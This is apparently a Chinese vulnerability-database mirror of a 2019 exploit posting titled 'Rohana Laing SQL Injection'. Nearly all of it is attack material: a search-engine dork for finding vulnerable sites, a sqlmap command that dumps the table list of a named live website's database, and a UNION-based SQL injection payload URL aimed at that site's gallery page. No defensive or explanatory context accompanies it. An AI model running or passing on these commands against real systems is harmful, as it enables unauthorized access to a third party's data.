Rohana Laing SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1615167 漏洞类型
发布时间 2019-05-19 更新时间 2019-05-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050201
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:Rohana Laing SQL Injection
# Date:17.05.2019
# Dork :intext:" 2019 Rohana Laing"  id=
# Exploit Author:Cerkuday 
# Tested on:Windows &Kali Linux


#Demo

http://www.rohanart.com/gallery.php?ID=51&gallery=5


# Poc:

sqlmap -u "http://www.rohanart.com/gallery.php?ID=50&gallery=5"    --random-agent -D rohanart_rohana --tables

http://www.rohanart.com/gallery.php?ID=50' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x69675657696870575343536d42425341784d5057456a666c44796d7445664e6e666e54674c536265,0x716a7a6a71),NULL,NULL,NULL,NULL,NULL#&gallery=5